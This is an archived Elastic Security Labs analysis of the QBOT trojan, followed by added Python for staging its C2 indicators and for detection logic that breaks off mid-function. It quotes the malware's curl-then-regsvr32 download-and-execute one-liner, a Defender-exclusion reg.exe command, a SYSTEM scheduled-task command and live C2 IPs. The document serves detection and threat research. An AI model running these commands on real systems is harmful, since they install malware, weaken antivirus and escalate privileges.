{
	"id": "36427f9e-3e27-4d23-95ad-86105956b7cd",
	"created_at": "2026-04-06T00:19:40.94517Z",
	"updated_at": "2026-04-10T13:12:55.16278Z",
	"deleted_at": null,
	"sha1_hash": "6b06ab0f700389140f5a908976144c5d72c0536b",
	"title": "Exploring the QBOT Attack Pattern",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 4712460,
	"plain_text": "Exploring the QBOT Attack Pattern\r\nBy Cyril François, Seth Goodwin, Andrew Pease\r\nPublished: 2022-08-22 · Archived: 2026-04-05 18:23:43 UTC\r\nKey Takeaways\r\nQBOT is a popular, actively developed, and full-featured trojan\r\nAdversary-controlled or owned infrastructure has been observed being used by numerous samples\r\nThe analyzed sample leverages multiple persistence and defense evasion mechanisms\r\nPreamble\r\nElastic Security Labs has been tracking REF3726, an attack pattern for the QBOT malware family. QBOT, also known as\r\nQAKBOT, is a prolific modular trojan that has been active since around 2007. QBOT’s loading mechanism makes it an\r\nattractive framework to threat actors and ransomware groups and has led to widespread infections of the family; targeting\r\nvictims across multiple verticals.\r\nThis research covers:\r\nExecution chain\r\nDefense evasion\r\nPersistence mechanisms\r\nPrivilege escalation\r\nNetwork events\r\nQBOT configuration extractor\r\nObserved tactics and techniques\r\nThrough this research, from static and dynamic analysis and Elastic telemetry, we uncovered 138 adversary-controlled or\r\nowned IP addresses. These IP addresses were linked to our sample and used to identify 339 additional associated malicious\r\nfiles. All artifacts are provided as STIX JSON and Elastic Common Schema (ECS) documents.\r\nFor information on the QBOT configuration extractor and malware analysis, check out our blog posts detailing\r\nthis:\r\nQBOT Configuration Extractor\r\nQBOT Malware Analysis\r\nAnalysis Environment\r\nWe selected a sample for analysis that we could statically and dynamically analyze. This process is commonly used to enrich\r\nboth types of analysis. For the dynamic analysis, the sample was detonated on a Windows 10 Enterprise VM running the\r\nElastic Endpoint, the Windows and Network Packet Capture Elastic Agent integrations, and an aggressive endpoint logging\r\npolicy. 
All events were shipped to our Elastic Cloud cluster and processed through the Elastic Security App. The Elastic\r\nSecurity Endpoint was configured for Alerting and Eventing only (no Prevention). Alerts were generated from Detection\r\nRules in the Security App and directly from the Elastic Security Endpoint default ruleset.\r\nExecution Chain\r\nhttps://www.elastic.co/security-labs/exploring-the-qbot-attack-pattern\r\nPage 1 of 20\n\nThe following section describes the observed execution chain for the QBOT malware sample. This includes events from\r\nInitial Execution to Defense Evasion to Persistence to Privilege Escalation.\r\nFull execution chain of the QBOT malware sample\r\nInitial Execution\r\nThe initial execution of the QBOT sample was observed in Elastic’s telemetry data (derived from @proxylife’s published\r\nresearch on QBOT).\r\n\"C:\\Windows\\System32\\cmd.exe\" /q /c echo 'Ft' \u0026\u0026 ping REDACTED[.]com \u0026\u0026 MD \"\\\\vyr\" \u0026\u0026 curl.exe -o \\\\vyr\\v4QpQt.Nqv.e8xO\r\nNote that the domains in the initial execution appear to be adversary-controlled, not adversary-owned; because of this, we\r\nare redacting them from our reporting.\r\nThe initial execution command does the following:\r\nC:\\Windows\\System32\\cmd.exe - this executes the Microsoft command interpreter\r\n/q - this switch of cmd.exe turns command echoing off\r\n/c - this switch of cmd.exe runs the command string that follows and then exits\r\necho ‘Ft’ - this prints ‘Ft’ to STDOUT\r\n\u0026\u0026 - if the preceding command succeeded, continue and run the next command; each step therefore runs only if the one\r\nbefore it worked\r\nping REDACTED[.]com - this performs a network connection test to an external domain using the Ping command\r\nMD “\\vyr” - this creates the vyr directory in the root directory of the current drive ( C: )\r\ncurl.exe - this executes the data transfer tool, cURL, which has shipped with Windows 10 since version 1803\r\n-o \\vyr\\v4QpQt.Nqv.e8xO https://REDACTED[.]net/t8EKnIB/C.png - using the cURL tool, download and save the\r\nC.png file, from REDACTED[.]net, to the vyr directory with a filename of v4QpQt.Nqv.e8xO\r\necho \"sxF\" - this prints “sxF” to STDOUT\r\nregsvr32 \"\\vyr\\v4QpQt.Nqv.e8xO\" - uses the Microsoft Register Server ( regsvr32 ) to execute\r\nv4QpQt.Nqv.e8xO; regsvr32 ignores the file extension, so the file served as C.png is loaded as a DLL regardless of its name\r\nThe infection was prevented by Elastic Endpoint Security, so while the customer was protected, it stopped our ability to\r\nmonitor the next steps in the infection. To continue the analysis, we manually detonated the sample in our sandbox.\r\nManually Advancing Execution\r\nThis manual detonation picked up where Elastic Endpoint Security stopped the initial execution outlined above.\r\nTo allow the infection to continue, the sample was downloaded to our victim machine and executed manually using the\r\nMicrosoft Register Server ( regsvr32.exe ). The Register Server is a command-line utility to register and unregister DLLs\r\n(and other objects) in the Windows Registry. Registering a DLL loads it and calls its DllRegisterServer export, which is why\r\nregsvr32.exe is a convenient way to run a malicious DLL without a dedicated loader.\r\nregsvr32 -s c2ba065654f13612ae63bca7f972ea91c6fe97291caeaaa3a28a180fb1912b3a.dll\r\nregsvr32 - this executes the Microsoft Register Server\r\n-s - this suppresses message boxes\r\nNow that we have manually executed the Qbot DLL, we can track the execution chain, defense evasion, and persistence\r\ntechniques using the Elastic Security Solution.\r\nFrom within the Security Solution, we can expand the malware event generated by the Qbot DLL execution and explore the\r\ndetails. While we manually executed the malware and know much of this information, it is still helpful as an analyst when\r\nresearching live malware events.\r\nInitial alert in the Kibana Security Solution\r\nFrom here we can click on the “Analyze event” button to launch a timeline as a process tree that will show us how the\r\nmalware progressed and additional contextually relevant information.\r\nViewing the execution chain as a process tree\r\nNow that we’re in the Analyzer view, we can continue to step through the QBOT DLL execution chain.\r\nMicrosoft Register Server used to execute the QBOT DLL\r\nThe Microsoft command interpreter was opened, and then the first regsvr32.exe process is started from\r\nC:\\Windows\\System32. Next, a child regsvr32.exe process is spawned from C:\\Windows\\SysWOW64 with the same\r\ncommand-line arguments. The SysWOW64 folder stores system files used to execute 32-bit processes on a 64-bit\r\nWindows operating system. This is expected because the Qbot DLL is a 32-bit file: the 64-bit regsvr32.exe cannot load a\r\n32-bit DLL, so it re-launches its 32-bit counterpart with the same arguments.\r\nOnce the DLL is running inside the 32-bit regsvr32.exe, it injects itself into the Explorer process.\r\nNext, an explorer.exe process is started and then immediately self-injects shellcode. In addition to the shellcode injection, we\r\ncan see 17 file events, 32 network-based events, and 16 registry events observed. 
We’ll explore those further in the research.\r\nQBOT injecting into explorer.exe\r\nBefore proceeding, QBOT performs a check to prevent execution on systems that are using the following default system\r\nlanguages:\r\nLANG_RUSSIAN (Russia)\r\nLANG_BELARUSIAN (Belarus)\r\nLANG_KAZAK (Kazakhstan)\r\nLANG_ARMENIAN (Armenia)\r\nLANG_GEORGIAN (Georgia)\r\nLANG_UZBEK (Uzbekistan)\r\nLANG_TAJIK (Tajikistan)\r\nLANG_TURKMEN (Turkmenistan)\r\nLANG_UKRAINIAN (Ukraine)\r\nLANG_BOSNIAN (Bosnia)\r\nLANG_KYRGYZ (Kyrgyzstan)\r\nQBOT checking for specified default system languages\r\nDefense Evasion\r\nOnce the initial execution chain was completed, we observed attempts at defense evasion to protect the malware and\r\nfrustrate adversary eviction.\r\nAs noted above, Elastic Endpoint Security observed 17 file events from the injected explorer.exe. One of the 17 events\r\noccurred when the DLL copied itself from its current path to\r\nC:\\Users\\[REDACTED]\\AppData\\Roaming\\Microsoft\\Vybgeuye and named itself maonyo.dll. The maonyo.dll file is\r\nthe same file as the original Qbot DLL that was manually executed, verified by the SHA-256 hash.\r\nCreation of the maonyo.dll file\r\nThis copy allows the QBOT DLL to continue to be executed even if the original file is deleted.\r\nIn addition to creating the maonyo.dll file, static malware analysis identified a thread called “watchdog”. The watchdog\r\nthread holds a list of security instrumentation tools and compares it to the running processes.\r\nEvery second, the watchdog thread will check to see if any of the running processes matches anything on the list.\r\nThe processes that are monitored for are common security analysis tools.\r\nWatchdog monitoring for security tooling\r\nIf any of the monitored processes are observed by the malware, it records that fact in the Windows Registry and proceeds with\r\nrandomly generated IP addresses instead of the hard-coded ones in the resources section, so it never attempts to connect to\r\nthe actual network infrastructure. An analyst who runs the sample with one of these tools visible will therefore see decoy\r\ntraffic rather than the real command and control addresses.\r\nOf note, the qak_proxy process identified in the monitored process list is unknown to us. It is possible that this is for an\r\nundisclosed security tool that monitors for QBOT network communications or when QBOT is acting as a proxy (which we\r\ndid not observe with our sample), but that is speculative in nature.\r\nThe static analysis showed that the malware is able to detect running antivirus by checking the list of running processes\r\nagainst known vendors’ binaries. Depending on the antivirus processes detected, the malware has different behaviors; as an\r\nexample, if Windows Defender is detected, it adds its persistence folder to the Windows Defender exclusion list.\r\nWatchdog monitoring for antivirus processes\r\nQBOT adding a Windows Defender exclusion path\r\nThe reg.exe command does the following:\r\nC:\\Windows\\system32\\reg.exe - the Windows registry command-line tool\r\nADD HKLM\\SOFTWARE\\Microsoft\\Windows Defender\\Exclusions\\Paths - the registry key that holds Windows Defender path\r\nexclusions\r\n/f - adds the registry entry without prompting for confirmation\r\n/t REG_DWORD - specifies the type for the registry entry\r\n/v C:\\Users\\[REDACTED]\\AppData\\Roaming\\Microsoft\\Vybgeuye - specifies the name of the registry entry; Defender reads\r\nthe value name as the excluded path\r\n/d 0 - specifies the data for the new registry entry\r\nWriting under HKLM requires administrative rights, so this step only succeeds if the injected explorer.exe is already running\r\nwith an elevated token.\r\nPersistence\r\nAfter the maonyo.dll file is created at the random location,\r\nC:\\Users\\[REDACTED]\\AppData\\Roaming\\Microsoft\\Vybgeuye (see the Defense Evasion section) in our example, two\r\nWindows Registry paths are created. The Run value\r\nHKEY_USERS\\S-1-5-21-1047687853-4161697681-4019128061-1002\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\lnkotdhh\r\nexecutes the maonyo.dll file every time the user with the SID S-1-5-21-1047687853-4161697681-4019128061-1002 logs onto the\r\ninfected host, and the key HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Maonyoeve (HKEY_CURRENT_USER is the same hive as\r\nHKEY_USERS\\<SID> for the logged-on user) holds the encrypted configuration data described below. This SID is for the user\r\nthat we used when detonating the DLL.\r\nWhile we did not observe QBOT spreading to other users' SIDs in the Windows Registry during dynamic\r\nanalysis, static analysis shows that this capability exists.\r\nWe were able to identify the registry path creations using Kibana (see below and in the Defense Evasion section). The\r\nsecurity researchers over at Trustwave’s SpiderLabs published some great research about how to find the location of the\r\ncreated QBOT DLL by decrypting binary data stored at HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\[random folder].\r\nLogon script added to the Windows Registry\r\nUsing the decryption tool that SpiderLabs released as part of their research, we were able to manually validate what we\r\nwere seeing in Kibana.\r\nDecrypting binary data added to the Windows Registry\r\nPrivilege Escalation\r\nThe privilege escalation mechanism we observed was when the injected explorer.exe process spawns schtasks.exe and\r\ncreates a new scheduled task to run as the SYSTEM user. Creating a task that runs as SYSTEM requires the caller to already\r\nbe elevated (an administrator with a full, non-UAC-filtered token), so this step moves from an elevated user context to\r\nSYSTEM rather than bypassing UAC.\r\nScheduled task creation\r\nC:\\Windows\\system32\\schtasks.exe, /Create, /RU, NT AUTHORITY\\SYSTEM, /tn, ayttpnzc, /tr, regsvr32.exe -s \"c:\\Users\\[RED\r\nThe initial schtasks.exe command does the following:\r\n/Create - creates a scheduled task\r\n/RU NT AUTHORITY\\SYSTEM - runs the task as the SYSTEM account, which is how the privilege escalation is achieved\r\n/tn ayttpnzc - defines the task name\r\n/tr regsvr32.exe -s\r\n\"c:\\Users\\[REDACTED]\\Desktop\\7611346142\\c2ba065654f13612ae63bca7f972ea91c6fe97291caeaaa3a28a180fb1912b3a\r\n- specifies the task to run\r\n/sc ONCE - specifies the schedule frequency - once\r\n/Z - option that marks the task to be deleted after its execution\r\n/ST 15:21 
- specifies the task start time (scheduled to start approximately two minutes after the scheduled task was\r\ncreated)\r\n/ET 15:33 - time to end the task if not completed\r\nNetwork Events\r\nAs noted in the Execution Chain section, there were 32 observed network events generated by the QBOT DLL. In addition to the\r\n32 events that we observed from the execution, we also identified 106 additional hard-coded IP addresses through static\r\nanalysis. This provided us with a total of 138 IP addresses from our Qbot sample.\r\nComparing the IP addresses against a corpus of malicious files, we identified 338 additional samples communicating with\r\nthe same network infrastructure.\r\nNetwork infrastructure observed in multiple samples\r\nWhen looking at the distribution of network and malware data points, not all of the samples are related to QBOT. Most of\r\nthe Win32DLL files are QBOT related, most of the Win32EXE files are associated with the EMOTET malware family, and\r\nthe Microsoft Office samples are related to generic malspam attachments.\r\nSamples by file type\r\nFurthermore, looking at the samples over time, we can see a change in how the network infrastructure was being used. Up to\r\nNovember 4, 2020, the samples are predominantly EMOTET and generic; the first QBOT sample in our dataset appears on\r\nNovember 28, 2020, and from there Win32DLL files make up 97.1% of samples first observed after November 2020.\r\nCollected samples over time\r\nAnalyzing Network Events\r\nWhen looking at the large number of IP addresses collected from both static and dynamic analysis, we wanted to put them\r\ninto a data analysis platform so that we could visualize them geographically and identify the network owners.\r\nTo do this, we used the ipinfo.io CLI tool. You can get an API key and download the tool for free.\r\nTo start, we collected our list of 138 IP addresses and then sent them through the ipinfo CLI tool as a bulk job, and output\r\nresults as JSON into a file called qbot.json.\r\n$ ipinfo bulk \u003e qbot.json\r\n** manual input mode **\r\nEnter all IPs, one per line:\r\n140.82.49.12\r\n144.202.2.175\r\n144.202.3.39\r\n149.28.238.199\r\n45.63.1.12\r\n45.76.167.26\r\n…truncated…\r\n{\r\n \"140.82.49.12\": {\r\n \"ip\": \"140.82.49.12\",\r\n \"hostname\": \"140.82.49.12.vultrusercontent.com\",\r\n \"city\": \"San Jose\",\r\n \"region\": \"California\",\r\n \"country\": \"US\",\r\n \"country_name\": \"United States\",\r\n \"loc\": \"37.3394,-121.8950\",\r\n \"org\": \"AS20473 The Constant Company, LLC\",\r\n \"postal\": \"95103\",\r\n \"timezone\": \"America/Los_Angeles\"\r\n },\r\n \"144.202.2.175\": {\r\n \"ip\": \"144.202.2.175\",\r\n \"hostname\": \"144.202.2.175.vultrusercontent.com\",\r\n \"city\": \"New York City\",\r\n \"region\": \"New York\",\r\n \"country\": \"US\",\r\n \"country_name\": \"United States\",\r\n \"loc\": \"40.7143,-74.0060\",\r\n \"org\": \"AS20473 The Constant Company, LLC\",\r\n \"postal\": \"10004\",\r\n \"timezone\": \"America/New_York\"\r\n },\r\n…truncated…\r\nNext, we need to change this into a newline-delimited JSON (NDJSON) file so that we can quickly upload it into\r\nElasticsearch for analysis. To do this, we can use jq, a command-line JSON processor. ipinfo keys its bulk output by IP\r\naddress, so the .[] filter emits each per-address object and -c writes each one on a single line.\r\n$ cat qbot.json | jq -c '.[]' \u003e qbot.ndjson\r\n{\"ip\":\"140.82.49.12\",\"hostname\":\"140.82.49.12.vultrusercontent.com\",\"city\":\"San Jose\",\"region\":\"California\",\"country\":\"US\"\r\n{\"ip\":\"144.202.2.175\",\"hostname\":\"144.202.2.175.vultrusercontent.com\",\"city\":\"New York City\",\"region\":\"New York\",\"country\"\r\n…truncated…\r\nNow that we have an NDJSON file, we can upload that into Elasticsearch through Kibana (or with Filebeat or the Elastic\r\nAgent). To do this, we’ll use the Elastic Container Project to spin up an entire Elastic Stack in Docker to do our analysis.\r\nOnce the containers have spun up, navigate to the Data Visualizer from within the Machine Learning menu. Select the\r\nNDJSON file that you created previously, and click the blue Import button.\r\nProvide an index name and then click on the Advanced tab. Under the Mappings settings, change loc to geo_point and then\r\nclick the blue Import button. The loc field is a \"latitude,longitude\" string, which Elasticsearch accepts for a geo_point field,\r\nso the data itself needs no reformatting; only the mapping changes.\r\nSet \"loc\" to \"geo_point\"\r\nNow that we have the data loaded into Elasticsearch, you can do additional analysis, such as creating a map visualization.\r\nWhen looking at the distribution of network entities, we see them spread across the globe with most of them belonging to a\r\nvariety of Internet service providers.\r\nMap of all identified network infrastructure\r\nOne caveat to the ISP-owned addresses: we did observe 7 IP addresses owned by Vultr. Vultr is a legitimate cloud hosting\r\nprovider and is also a favorite among adversaries because of the ability to upload custom ISO files that allow for a protected\r\ncommand \u0026 control server.\r\nNetwork infrastructure node information\r\nQBOT Configuration Extractor\r\nCollecting elements of malware events is a valuable analysis skill that can assist in the identification of additional\r\ncompromised hosts in a contested environment.\r\nElastic Security Labs has released an open source tool, under the Apache 2.0 license, that will allow for configurations to be\r\nextracted from QBOT samples. The tool can be downloaded here.\r\n$ qbot-config-extractor -f c2ba065654f13612ae63bca7f972ea91c6fe97291caeaaa3a28a180fb1912b3a\r\n=== Strings ===\r\n# Blob address: 0x100840a0\r\n# Key address: 0x10084040\r\n[0x0]: ProgramData\r\n[0xc]: /t4\r\n[0x10]: EBBA\r\n[0x15]: netstat -nao\r\n[0x22]: jHxastDcds)oMc=jvh7wdUhxcsdt2\r\n[0x40]: schtasks.exe /Create /RU \"NT AUTHORITY\\SYSTEM\" /SC ONSTART /TN %u /TR \"%s\" /NP /F\r\n...truncated...\r\n=== RESOURCE 1 ===\r\nKey: b'\\\\System32\\\\WindowsPowerShel1\\\\v1.0\\\\powershel1.exe'\r\nType: DataType.DOMAINS\r\n41.228.22.180:443\r\n47.23.89.62:995\r\n176.67.56.94:443\r\n103.107.113.120:443\r\n148.64.96.100:443\r\n47.180.172.159:443\r\n181.118.183.98:443\r\n...truncated...\r\nNote the schtasks template at offset 0x40 uses /SC ONSTART (run at system start), a different schedule from the one-time\r\nSYSTEM task observed during dynamic analysis.\r\nWe have asked Vultr to review our QBOT research and take appropriate actions in accordance with their customer Use\r\nPolicy, but have not received a response as of publication.\r\nObserved Adversary Tactics and Techniques\r\nTactics\r\nUsing the MITRE ATT\u0026CK® framework, tactics represent the why of a technique or sub-technique. 
It is the adversary’s\r\ntactical goal: the reason for performing an action.\r\nExecution\r\nPersistence\r\nPrivilege Escalation\r\nDefense Evasion\r\nCommand and Control\r\nTechniques / Sub Techniques\r\nTechniques and Sub techniques represent how an adversary achieves a tactical goal by performing an action.\r\nCommand and Scripting Interpreter: Windows Command Shell\r\nScheduled Task/Job: Scheduled Task\r\nBoot or Logon Autostart Execution: Registry Run Keys / Startup Folder\r\nValid Accounts: Default Accounts\r\nIngress Tool Transfer\r\nApplication Layer Protocol: Web Protocols\r\nIndicator Removal on Host: File Deletion\r\nDetections\r\nThe following detection rules and behavior prevention events were observed throughout the analysis of the QBOT sample.\r\nSuspicious Execution via Scheduled Task\r\nStartup or Run Key Registry Modification\r\nMemory Threat Detection Alert: Shellcode Injection\r\nMalicious Behavior Detection Alert: Suspicious String Value Written to Registry Run Key\r\nMalicious Behavior Detection Alert: Suspicious Scheduled Task Creation\r\nYARA\r\nElastic Security has created YARA rules to identify this activity.\r\nrule Windows_Trojan_Qbot_1 {\r\n meta:\r\n author = \"Elastic Security\"\r\n creation_date = \"2021-02-16\"\r\n last_modified = \"2021-08-23\"\r\n os = \"Windows\"\r\n arch = \"x86\"\r\n category_type = \"Trojan\"\r\n family = \"Qbot\"\r\n threat_name = \"Windows.Trojan.Qbot\"\r\n reference_sample = \"636e2904276fe33e10cce5a562ded451665b82b24c852cbdb9882f7a54443e02\"\r\n strings:\r\n $a1 = { 33 C0 59 85 F6 74 2D 83 66 0C 00 40 89 06 6A 20 89 46 04 C7 46 08 08 00 }\r\n $a2 = { FE 8A 14 06 88 50 FF 8A 54 BC 11 88 10 8A 54 BC 10 88 50 01 47 83 }\r\n condition:\r\n any of them\r\n}\r\nrule Windows_Trojan_Qbot_2 {\r\n meta:\r\n author = \"Elastic Security\"\r\n creation_date = \"2021-10-04\"\r\n last_modified = \"2022-01-13\"\r\n os = \"Windows\"\r\n arch = \"x86\"\r\n category_type = \"Trojan\"\r\n family = \"Qbot\"\r\n threat_name = \"Windows.Trojan.Qbot\"\r\n reference_sample = \"a2bacde7210d88675564106406d9c2f3b738e2b1993737cb8bf621b78a9ebf56\"\r\n strings:\r\n $a1 = \"%u.%u.%u.%u.%u.%u.%04x\" ascii fullword\r\n $a2 = \"stager_1.dll\" ascii fullword\r\n condition:\r\n all of them\r\n}\r\nrule Windows_Trojan_Qbot_3 {\r\n meta:\r\n author = \"Elastic Security\"\r\n creation_date = \"2022-03-07\"\r\n last_modified = \"2022-04-12\"\r\n os = \"Windows\"\r\n arch = \"x86\"\r\n category_type = \"Trojan\"\r\n family = \"Qbot\"\r\n threat_name = \"Windows.Trojan.Qbot\"\r\n reference_sample = \"0838cd11d6f504203ea98f78cac8f066eb2096a2af16d27fb9903484e7e6a689\"\r\n strings:\r\n $a1 = { 75 C9 8B 45 1C 89 45 A4 8B 45 18 89 45 A8 8B 45 14 89 45 AC 8B }\r\n $a2 = \"\\\\stager_1.obf\\\\Benign\\\\mfc\\\\\" wide\r\n condition:\r\n any of them\r\n}\r\nrule Windows_Trojan_Qbot_4 {\r\n meta:\r\n author = \"Elastic Security\"\r\n creation_date = \"2022-06-07\"\r\n last_modified = \"2022-07-18\"\r\n os = \"Windows\"\r\n arch = \"x86\"\r\n category_type = \"Trojan\"\r\n family = \"Qbot\"\r\n threat_name = \"Windows.Trojan.Qbot\"\r\n reference_sample = \"c2ba065654f13612ae63bca7f972ea91c6fe97291caeaaa3a28a180fb1912b3a\"\r\n strings:\r\n $a1 = \"qbot\" wide\r\n $a2 = \"stager_1.obf\\\\Benign\\\\mfc\" wide\r\n $a3 = \"common.obf\\\\Benign\\\\mfc\" wide\r\n $a4 = \"%u;%u;%u;\"\r\n $a5 = \"%u.%u.%u.%u.%u.%u.%04x\"\r\n $a6 = \"%u\u0026%s\u0026%u\"\r\n $get_string1 = { 33 D2 8B ?? 6A 5A 5? F7 ?? 8B ?? 08 8A 04 ?? 8B 55 ?? 8B ?? 10 3A 04 ?? }\r\n $get_string2 = { 33 D2 8B ?? F7 75 F4 8B 45 08 8A 04 02 32 04 ?? 88 04 ?? ?? 83 ?? 01 }\r\n $set_key = { 8D 87 00 04 00 00 50 56 E8 ?? ?? ?? ?? 59 8B D0 8B CE E8 }\r\n $do_computer_use_russian_like_keyboard = { B9 FF 03 00 00 66 23 C1 33 C9 0F B7 F8 66 3B 7C 4D }\r\n $execute_each_tasks = { 8B 44 0E ?? 85 C0 74 ?? FF D0 EB ?? 6A 00 6A 00 6A 00 FF 74 0E ?? E8 ?? ?? ?? ?? 83 C4 10\r\n $generate_random_alpha_num_string = { 57 E8 ?? ?? ?? ?? 48 50 8D 85 ?? ?? ?? ?? 6A 00 50 E8 ?? ?? ?? ?? 8B 4D ?? 8\r\n $load_base64_dll_from_file_and_inject_into_targets = { 10 C7 45 F0 50 00 00 00 83 65 E8 00 83 7D F0 0B 73 08 8B 45\r\n condition:\r\n 6 of them\r\n}\r\nReferences\r\nThe following were referenced throughout the above research:\r\nhttps://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/decrypting-qakbots-encrypted-registry-keys/\r\nhttps://twitter.com/pr0xylife/status/1539601609730170882?s=20\u0026t=G-XR7ibeOO0nWCWajKWTKw\r\nhttps://github.com/drole/qakbot-registry-decrypt\r\nhttps://malpedia.caad.fkie.fraunhofer.de/details/win.emotet\r\nhttps://malpedia.caad.fkie.fraunhofer.de/details/win.qakbot\r\nArtifacts\r\nArtifacts are also available for download in both ECS and STIX format in a combined zip bundle.\r\nSource: https://www.elastic.co/security-labs/exploring-the-qbot-attack-pattern",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://www.elastic.co/security-labs/exploring-the-qbot-attack-pattern"
	],
	"report_names": [
		"exploring-the-qbot-attack-pattern"
	],
	"threat_actors": [],
	"ts_created_at": 1775434780,
	"ts_updated_at": 1775826775,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/6b06ab0f700389140f5a908976144c5d72c0536b.pdf",
		"text": "https://archive.orkl.eu/6b06ab0f700389140f5a908976144c5d72c0536b.txt",
		"img": "https://archive.orkl.eu/6b06ab0f700389140f5a908976144c5d72c0536b.jpg"
	}
}
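The network-infrastructure staging procedure in the article's "Analyzing Network Events" and "QBOT Configuration Extractor" sections (pull the ip:port pairs out of the extractor output, feed the unique IPs to `ipinfo bulk`, flatten the bulk JSON to NDJSON as `jq -c '.[]'` does, and import with `loc` mapped as a geo_point), carried through as one added Python example. This is not code from the article or from Elastic's tooling; both sample inputs are constructed from the truncated outputs printed in the article, trimmed to the fields used here, and the explicit index mapping stands in for the Data Visualizer's mapping override.

```python
"""Stage the network indicators from the QBOT research for Elasticsearch.

Added example (not Elastic Security Labs code). Both sample inputs are
constructed from the truncated outputs shown in the article; a real
extractor run and a real `ipinfo bulk` run produce far more records.
"""
import json
import re
from collections import Counter

# Constructed: the '=== RESOURCE 1 ===' block as printed in the article.
EXTRACTOR_OUTPUT = r"""
=== RESOURCE 1 ===
Key: b'\\System32\\WindowsPowerShel1\\v1.0\\powershel1.exe'
Type: DataType.DOMAINS
41.228.22.180:443
47.23.89.62:995
176.67.56.94:443
103.107.113.120:443
"""

# Constructed: the two complete records shown in the article's `ipinfo bulk`
# output, trimmed to the fields used below.
IPINFO_BULK = {
    "140.82.49.12": {
        "ip": "140.82.49.12",
        "hostname": "140.82.49.12.vultrusercontent.com",
        "city": "San Jose", "region": "California", "country": "US",
        "loc": "37.3394,-121.8950",
        "org": "AS20473 The Constant Company, LLC",
    },
    "144.202.2.175": {
        "ip": "144.202.2.175",
        "hostname": "144.202.2.175.vultrusercontent.com",
        "city": "New York City", "region": "New York", "country": "US",
        "loc": "40.7143,-74.0060",
        "org": "AS20473 The Constant Company, LLC",
    },
}

ENDPOINT_RE = re.compile(r"^(\d{1,3}(?:\.\d{1,3}){3}):(\d{1,5})$")


def parse_c2_endpoints(text):
    """Return (ip, port) tuples for every 'ip:port' line in the extractor output."""
    endpoints = []
    for line in text.splitlines():
        match = ENDPOINT_RE.match(line.strip())
        if match:
            endpoints.append((match.group(1), int(match.group(2))))
    return endpoints


def ipinfo_bulk_input(endpoints):
    """Unique IPs, one per line: the text piped into `ipinfo bulk` on stdin."""
    return "\n".join(sorted({ip for ip, _ in endpoints})) + "\n"


def bulk_to_ndjson(bulk):
    """One compact JSON document per line, as `jq -c '.[]'` produces.

    ipinfo keys the bulk result by IP, so each value is one document. The
    `loc` field is left as the 'lat,lon' string ipinfo returns; Elasticsearch
    accepts that format for a geo_point field, so only the mapping changes.
    """
    return [json.dumps(record, separators=(",", ":")) for record in bulk.values()]


def index_mapping():
    """Explicit mapping equivalent to setting `loc` to geo_point in the
    Data Visualizer import; without it `loc` is indexed as plain text."""
    return {"mappings": {"properties": {
        "ip": {"type": "ip"},
        "loc": {"type": "geo_point"},
        "org": {"type": "keyword"},
        "hostname": {"type": "keyword"},
        "country": {"type": "keyword"},
    }}}


def count_by_asn(bulk):
    """Tally documents by AS number so hosting providers (AS20473 is Vultr /
    The Constant Company) stand out from the long tail of residential ISPs."""
    return Counter(record["org"].split()[0] for record in bulk.values())


if __name__ == "__main__":
    endpoints = parse_c2_endpoints(EXTRACTOR_OUTPUT)
    print(ipinfo_bulk_input(endpoints), end="")    # pipe this into: ipinfo bulk > qbot.json
    print("\n".join(bulk_to_ndjson(IPINFO_BULK)))  # contents of qbot.ndjson
    print(json.dumps(index_mapping()))             # PUT /<index> body before importing
    print(count_by_asn(IPINFO_BULK).most_common())
```

Sorting the unique IPs before sending them to ipinfo makes the bulk request reproducible, and tallying by AS number is the quickest way to spot the 7 Vultr addresses the article singles out among the ISP-owned majority.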
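The behaviours the article walks through (the cmd.exe curl-then-regsvr32 one-liner, regsvr32 loading an oddly named or AppData-resident module, reg.exe adding a Windows Defender exclusion, and a SYSTEM scheduled task whose action is regsvr32) as detection logic run over constructed process events. This is an added Python example, not Elastic's shipped detection rules: the events carry a flat subset of ECS process fields (process.name, process.args, process.command_line), the command lines are the ones shown in the article with the cmd.exe one-liner reassembled from its step-by-step description because the printed listing is truncated, and the event ids and the benign control event are made up.

```python
"""Detection logic for the QBOT behaviours described in the article, run over
constructed process events. Added example, not Elastic's detection rules.

Each event is a flat dict with a subset of ECS process fields. Command lines
come from the article ([REDACTED] kept as printed); ids and the benign
control event (id 6) are constructed for this example.
"""

EVENTS = [
    {"id": 1, "name": "cmd.exe",
     "command_line": r'"C:\Windows\System32\cmd.exe" /q /c echo Ft && ping REDACTED[.]com '
                     r'&& MD "\vyr" && curl.exe -o \vyr\v4QpQt.Nqv.e8xO '
                     r'https://REDACTED[.]net/t8EKnIB/C.png && echo sxF && regsvr32 "\vyr\v4QpQt.Nqv.e8xO"'},
    {"id": 2, "name": "regsvr32.exe",
     "args": ["regsvr32", r"\vyr\v4QpQt.Nqv.e8xO"]},
    {"id": 3, "name": "regsvr32.exe",
     "args": ["regsvr32", "-s", r"C:\Users\[REDACTED]\AppData\Roaming\Microsoft\Vybgeuye\maonyo.dll"]},
    {"id": 4, "name": "reg.exe",
     "args": [r"C:\Windows\system32\reg.exe", "ADD",
              r"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths", "/f", "/t", "REG_DWORD",
              "/v", r"C:\Users\[REDACTED]\AppData\Roaming\Microsoft\Vybgeuye", "/d", "0"]},
    {"id": 5, "name": "schtasks.exe",
     "args": [r"C:\Windows\system32\schtasks.exe", "/Create", "/RU", r"NT AUTHORITY\SYSTEM",
              "/tn", "ayttpnzc",
              "/tr", r'regsvr32.exe -s "c:\Users\[REDACTED]\Desktop\7611346142\c2ba065654f13612ae63bca7f972ea91c6fe97291caeaaa3a28a180fb1912b3a.dll"',
              "/sc", "ONCE", "/Z", "/ST", "15:21", "/ET", "15:33"]},
    # Constructed benign control: an installer registering a vendor DLL.
    {"id": 6, "name": "regsvr32.exe",
     "args": ["regsvr32.exe", "/s", r"C:\Program Files\Vendor\app.dll"]},
]


def _lower_args(event):
    return [a.lower() for a in event.get("args", [])]


def curl_then_regsvr32(event):
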